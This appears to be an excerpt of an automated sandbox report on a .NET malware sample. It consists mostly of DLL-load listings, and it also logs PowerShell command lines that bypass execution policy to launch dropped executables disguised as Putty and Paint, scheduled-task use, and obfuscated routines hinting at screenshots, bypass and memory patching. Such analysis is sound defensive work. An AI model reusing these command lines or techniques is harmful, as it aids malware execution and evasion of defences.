Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Section loaded: secur32.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: version.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: version.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: version.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: amsi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: userenv.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: profapi.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sxs.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devenum.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: winmm.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: devobj.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msasn1.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: msdmo.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: wldp.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\xdwdPutty.exe	Section loaded: secur32.dll

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ptKNiAaGus.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ptKNiAaGus.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: ptKNiAaGus.exe, WSBzhPoDCyO.cs	.Net Code: DkrItwdZ
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	.Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	.Net Code: Read System.Reflection.Assembly.Load(byte[])
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.cs	.Net Code: Read
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, gEjezvihrA.cs	.Net Code: oRziWoOpFzwVe
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, gEjezvihrA.cs	.Net Code: oRziWoOpFzwVe
Source: xdwdPutty.exe.33.dr, gEjezvihrA.cs	.Net Code: oRziWoOpFzwVe

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'

Binary contains a suspicious time stamp

Source: ptKNiAaGus.exe

Static PE information: 0xF5FE416F [Wed Oct 13 03:20:15 2100 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Code function: 0_2_00007FFF60F500BD pushad ; iretd	0_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 17_2_00007FFF60F500BD pushad ; iretd	17_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F63928 push eax; retf	19_2_00007FFF60F63931
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F600BD pushad ; iretd	19_2_00007FFF60F600C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F68780 push es; ret	19_2_00007FFF60F68C46
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Code function: 19_2_00007FFF60F68780 push es; ret	19_2_00007FFF60F68C4E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F43928 push eax; retf	33_2_00007FFF60F43931
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F400BD pushad ; iretd	33_2_00007FFF60F400C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F48780 push es; ret	33_2_00007FFF60F48C46
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Code function: 33_2_00007FFF60F48780 push es; ret	33_2_00007FFF60F48C4E
Source: C:\Users\user\xdwdPutty.exe	Code function: 36_2_00007FFF60F400BD pushad ; iretd	36_2_00007FFF60F400C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 50_2_00007FFF60F200BD pushad ; iretd	50_2_00007FFF60F200C1
Source: C:\Users\user\xdwdPutty.exe	Code function: 55_2_00007FFF60F500BD pushad ; iretd	55_2_00007FFF60F500C1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Code function: 64_2_00007FFF60F600BD pushad ; iretd	64_2_00007FFF60F600C1
Source: C:\Users\user\xdwdPutty.exe	Code function: 78_2_00007FFF60F300BD pushad ; iretd	78_2_00007FFF60F300C1

Source: ptKNiAaGus.exe, BlZVXHIIaPbHfI.cs	High entropy of concatenated method names: 'tSODIOiBRDXJwkT', 'BJcsukRMTZ', 'wvIinJskLeX', 'eSjHRzyM', 'GAZxDPFJBCj', 'pmFJVkADAIldI', 'ZKcANVNApvikktn', 'KbnSpgexvOxJ', 'yPwpEqvgApO', 'oxKbkAHQZxJ'
Source: ptKNiAaGus.exe, ngXUOZCVh.cs	High entropy of concatenated method names: 'SugoyTPgJVvv', 'lWREblyMHEKGgdx', 'wVWJrmsraWSrMU', 'LsgmxwUakjPKpWh', 'qRtNAZmIzd', 'dESGAnJyOArz', 'bulabbDUsFcaSH', 'mFXmUWrWRcPWfXT', 'zSDlFnLhXa', 'kyqghgPL'
Source: ptKNiAaGus.exe, aTWRcRmMPAC.cs	High entropy of concatenated method names: 'YWlLHFrhEUxDwZo', 'QNksPVFxWLWn', 'tgWUvohOwiwNQU', 'VSUDcHvC', 'JhDRnoviDs', 'najBlHPTf', 'fzAzbEqTLgxeHK', 'kQaHmNJXJR', 'iTSVrcWadiCRMkE', 'sLMJTYnArp'
Source: ptKNiAaGus.exe, rEMvqXUYw.cs	High entropy of concatenated method names: 'KQdgoRhaxzvrrCD', 'ZwAejkTaYkz', 'eUlIvLBnLcIAl', 'ngMAMJrSyYXSO', 'xCHESzwdOmw', 'AQMxoAtxxnNYX', 'qLVNlcwcqIUDim', 'KSZEgJbFBkXZQc', 'ojhcIkHAB', 'kXaDckRHJm'
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.cs	High entropy of concatenated method names: 'KzETmFIz', 'HggOwIlWtJnS', 'fZytGkgFkIg', 'qyHrOJZtuG', 'chytZbKsAjkUf', 'syYTXXYzvGJ', 'efANZeZsWMIq', 'dZPgjFec', 'VKBZXiHdlsj', 'wermKFvmygqhNtx'
Source: ptKNiAaGus.exe, kiBrAzKlhwI.cs	High entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'GFHyolqxTiPW', 'rTDCGOXiyndD', 'xofGmlAsdGWCitw', 'ABTeMIfH', 'ailvIRdutoBSM', 'eWmNMhAYVadxmKY', 'oIXXMDOwVpsHo', 'vmoFpIZv', 'aiBMLSKeSW'
Source: ptKNiAaGus.exe, FSmyfmyMutFI.cs	High entropy of concatenated method names: 'IHADBbEs', 'hQUjjodBxy', 'BVWSWKGm', 'NYnlEwRYEl', 'QmolVevCJjswHEE', 'lihqVSbCIdienW', 'xMDnOgkw', 'OEchVcghzJgpXv', 'yLlcsvQOndv', 'DRqGAlpbQpthg'
Source: ptKNiAaGus.exe, fJqINigGmUCZC.cs	High entropy of concatenated method names: 'QlbUeGpFUx', 'olCxFkzEoyLXkt', 'zFJGvZFLDjJBq', 'rZpsSZweJhjCU', 'TFNqauGkwN', 'QiZyOwjJ', 'xYVfRUnVvcX', 'FqsyVSbwaGdcqC', 'WfvlAswRujiZFG', 'pUpJKrhAsdHNw'
Source: ptKNiAaGus.exe, BsbXIFfqT.cs	High entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'UAOIwMuBa', 'mRWRLoTV', 'FiZsYJBwGnrKc', 'UBMyoZKFhorUkV', 'MUlKKOcvH', 'yuQnOiuKZCPypf'
Source: ptKNiAaGus.exe, nOmJeajqakZQx.cs	High entropy of concatenated method names: 'VMDOPKelokaHLzt', 'kzXYTmdFAApojK', 'zFhHDuDSU', 'CZBjWOjw', 'zZsZeiiyNOUpB', 'baBdspyhhCSR', 'bVdlGrCKk', 'gCYVvpDA', 'AvaJVkrHiS', 'qGMVHcjcOxyTrU'
Source: ptKNiAaGus.exe, vJbYblzYrfoB.cs	High entropy of concatenated method names: 'gFWqIJotzNwvM', 'pfdyvOpMWAXN', 'tmLjgQlSNFQ', 'MEkwwfdOG', 'sNgsnsTiV', 'ulvGndQeaNb', 'NpjJFQaUuyS', 'tyCnctyfkwPbJ', 'ISPyothTzrJe', 'CIAZvTLNpbcChO'
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.cs	High entropy of concatenated method names: 'oDwpjjxTMPM', 'PUGJgxszPRRk', 'VAcvknCno', 'JWXeSLLnqrXP', 'hrZLRvHW', 'MfOjUXcbJpaqw', 'ITaoEdbtnGyvDK', 'kshHYJsPjqnK', 'hhoKkDRrrG', 'tJSsIlZU'
Source: ptKNiAaGus.exe, WBkUEsbhmZeNIv.cs	High entropy of concatenated method names: 'SoSyVSXfCVs', 'XTskBgXiTfIyZBX', 'UgSMOJxLAaoY', 'WiyMvDNtpchkMCn', 'UZUvtLVCfiNW', 'jbsykxwJldxJk', 'DlbCGKfgATdE', 'MwgMprLGB', 'lcEqWivWlJgSRD', 'GLCCaYVfmkNF'
Source: ptKNiAaGus.exe, ctLKvSYSpZJt.cs	High entropy of concatenated method names: 'juxIMOhpgo', 'RdVUgDBImozuSxE', 'gPXRhKdsjiHcVG', 'vENtRwDmmXBHbk', 'fKIaAaIX', 'HAdkywZmfA', 'pFEmsddl', 'gCBHjCwUvGNmhw', 'RSTnqyPcagKZG', 'hXwXekEyVBv'
Source: ptKNiAaGus.exe, ixSNFcnAZd.cs	High entropy of concatenated method names: 'yFrqudjmVPGe', 'JkHgNblQEtPkoGd', 'UmYjXsTLRQXsFez', 'TUDUVGmysNtM', 'FGXGoBdivZQR', 'PxDsLatoRUCIcNz', 'qKzGjLKzlQd', 'sXunDYrpvAB', 'TnolVxMndI', 'PRKNDnDH'
Source: ptKNiAaGus.exe, TJFZgosWeymV.cs	High entropy of concatenated method names: 'gSupzYBgpZPN', 'IKqmTgAuQrpwBf', 'nGhYugYGHy', 'URudkqMsgigseFV', 'PbFtyslsjrqSH', 'EjoZMiAmGzjJz', 'HODTYxJeCFwbg', 'utAulwew', 'FtnjcVFJ', 'tEkVoXtKaZgjdk'
Source: ptKNiAaGus.exe, EzwqebyGv.cs	High entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'XvhDVIDTsz', 'FblPzXsORRWA', 'JozepQtc', 'apucNvwVuq', 'jyYLbeDFsew', 'vethIZdb', 'zpAwVWKx', 'vXfbTLPoDL', 'okmdoyxTOn'
Source: ptKNiAaGus.exe, ncSubYLaTjDxEKi.cs	High entropy of concatenated method names: 'HDWwlYrbKQdNSsA', 'esngNPlUUlpm', 'hZZcJBbDb', 'PkqkKvxIa', 'ZSMWBisRCbAjF', 'crElIqYaDj', 'wXebZXdPCkO', 'CaaJJAzIff', 'HSrMzkKyPcy', 'LNpcEWUC'
Source: ptKNiAaGus.exe, WSBzhPoDCyO.cs	High entropy of concatenated method names: 'zIwxKQJLlKR', 'qABCbysjh', 'zBiSdHrPVoqvwo', 'hjTaakMApIh', 'lbEFfpGJvP', 'mCUVodUuDMfuPZ', 'HInAsKwtF', 'RiLGpfbSrhYGOX', 'VNeBGhpfWiy', 'uWhqIOhXuJo'
Source: ptKNiAaGus.exe, YdxQPCPenRPlm.cs	High entropy of concatenated method names: 'OxDjszrRWVWVc', 'dsDylpVj', 'yDTeALhtU', 'ITqcXHToHG', 'tuaIAuNQzwPf', 'EgZVrFobCHTnnQ', 'qSANchFJsVzQ', 'dURtnDXriyx', 'RArmGVNe', 'ZhvBDFzXgzroU'
Source: ptKNiAaGus.exe, UfMnWsvflYsaAsK.cs	High entropy of concatenated method names: 'cSvGSUoqZkIU', 'bDaXGzsPHOnjQl', 'wNlgcmunuLdArVN', 'kboKUSDusSOUE', 'WBiutLybr', 'gQfLczAt', 'bDIbbZeKroKYajm', 'cRxbCoIjkdDmrS', 'RUacEOZHUPBGnh', 'GhsWzhCRrmuY'
Source: ptKNiAaGus.exe, LyYGZtBCXfhLta.cs	High entropy of concatenated method names: 'CegapNQcJfAJ', 'AHNZNTemugjcDX', 'vdREkUzXp', 'CcvVObYkKCPSHxa', 'oIxwxlqEggNwYWA', 'YdKqiQfFKstUw', 'WUdnfrZszRmr', 'iNcLoBfudmjOYc', 'mFsVHCJtSkqJLf', 'tDqbwrigESQj'
Source: ptKNiAaGus.exe, LgUPyuNhoLG.cs	High entropy of concatenated method names: 'qASorupmplRQ', 'CDYUXuDrC', 'qcrJhNQjBoYVi', 'HcVZjhZODFwrpM', 'QDmoSbLzkI', 'ZCPcmgViMvY', 'IVIbZmNpXDSk', 'lhPNwclQJHXzb', 'PWGzVsYeSK', 'mMWSBVjf'
